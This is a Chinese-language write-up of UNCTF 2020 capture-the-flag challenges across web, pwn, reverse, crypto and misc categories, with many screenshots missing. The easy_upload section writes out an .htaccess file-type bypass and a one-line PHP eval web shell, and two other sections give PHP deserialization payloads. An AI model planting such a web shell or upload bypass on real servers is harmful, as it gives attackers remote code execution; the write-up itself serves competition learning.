【CTF】UNCTF Writeup by Satan9a

CTF · 2020-11-15 · 2947 人浏览

比赛:UNCTF2020校内赛

ID:Satan9a

xuxuan AN_666 Xunflash

Web

1.easy_ssrf

请输入图片描述

2.俄罗斯方块人大战奥特曼

查看源代码,发现有一个压缩包

请输入图片描述

下载下来

33

发现有

44

打开即可得到flag

55

3.easy_upload

解题过程:

上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容

plain
AddType application/x-httpd-p\
hp .jpg

上传hp.jpg
内容

plain
<?=eval($_POST[satan]);

连接蚁剑得到flag

4.easyunserialize

解题过程:

反序列化字符串逃逸,构造payload

plain
challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;;

得出flag

5.ezphp

解题过程:

原题,构造payload

plain
data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}

得到flag

Pwn

1.YLBNB

使用pwntools

66

Reverse

1.recheckin

解题过程:

打开ida搜welcome,按f5

77

得到伪代码,可知与str2比较,双击跳转

88

双击,后面的按r转换成字符

99

Crypto

1.wing

解题过程:附件的图片是一些符号,一点都看不懂,提示说是office,于是打开office![图片]a

里面的字体里有一个叫11a

的字体,发现里面的字体正好是这些符号,于是一个个对比过去,把附件里的符号全部输入到office,然后转换为宋体12a13a

得到flag

2.鞍山大法官

14a

看到营养想到培根加密

将o替换位A,t替换为B

解密即可

15a

3.easy_rsa

16

17

4.简单的RSA

18

得到d

19

20

5.快乐数学

第一小问找规律即可

21

222324

第二小问

25

第三小问

2627

\sqrt[2020]{2020!}-\frac{1}{112}-\frac{28\pi}{3}

md5加密即可

28

Misc

1.mouse_click

解题过程:

下载脚本https://github.com/WangYihang/UsbMiceDataHacker,下载后放到wireshark根目录,附件也放进去,管理员运行cmd,cd到wireshark根目录,输入

plain
python2 UsbMiceDataHacker.py mouse_click.pcapng LEFT

然后就自动绘制出了鼠标运行轨迹
29

得出flag

2.倒影

解题过程:

010editor打开文件,底部有一串base64字符,解码后得到一串hex码,但是得不出东西,根据题目名称提示,将hex码倒序输出,再使用010editor生成文件得出压缩包,有密码,爆破六位数密码后得出flag

3.你能破解我的密码吗

解题过程:

shadow是linux /etc/shadow文件,文本打开,有一行guguguguji30后面接了md5,根据shadow文件格式,md5解密结果123456即密码.

4.阴阳人编码

解题过程:打开文件,格式是一个没有见过的编码,但是很熟悉,和Ook编码很像,尝试一下,把“就这.”换成“Ook.”,“就这¿”换成“Ook?”,“不会吧!”换成“Ook!”。然后解密,得到flag! 31

5.EZIMAGE

解题过程:

使用imgmagick里面的montage拼图

plain
montage unctf*.png -tile 15*15-geometry +0+0 flag.png

然后得到这个
32

然后gaps拼图

plain
gaps --image=flag.png --size=60 --save

得到flag!33

6.零

解题过程:打开txt,是一段字母,尝试词频分析没有用,全选复制到wps,发现有多处留白,百度得知是零宽度字符串隐写,http://330k.github.io/misc_tools/unicode_steganography.html

进入这个网站,解密得到flag34

7.网络深处1

解题过程:解压文件,有一段拨号音,不知道要干什么,尝试解压里面的压缩包,发现要密码,猜测电话号码就是密码,11位数字密码爆破35

解压压缩包,里面有一段音频,Audacity打开36

看不出什么东西,查看频谱图37

https://tuppers-formula.ovh/

进入网站,把长串数字复制粘贴38

得到flag

8.baba_is_you

39

有一个b站地址

flag在评论区

40

9.撕毁的二维码

41

10.被删除的flag

放BT5里

cat flag

42

直接得到flag

43

11.爷的历险记

44

解摩丝码

拿到屠龙刀

45

打了第一个boss

46

47

48

做异或 开第二个宝箱

49

购买hint2

修改hint2提示的那个文件

50

打倒第三个boss

拿到flag

51

12.躲猫猫

后缀改成zip解压, 打开/xl/sharedstring.xml

里面一串base64解码即可52

13.YLB's CAPTCHA - 签到题

阴间签到,验证码纯眼看,连对十次就可以得到flag了。

CTF WEB RE MISC CRYPTO PWN
  1. Xunflash (作者)  2020-12-13

    这篇文章由于图太多,测试一下自己的图床,没想到这么慢,明年三月的样子我满18,备案完就把小站转到服务器上面 🙏 :xwx15: 这段时间大家先凑合看一看8

Theme Jasmine by Kent Liao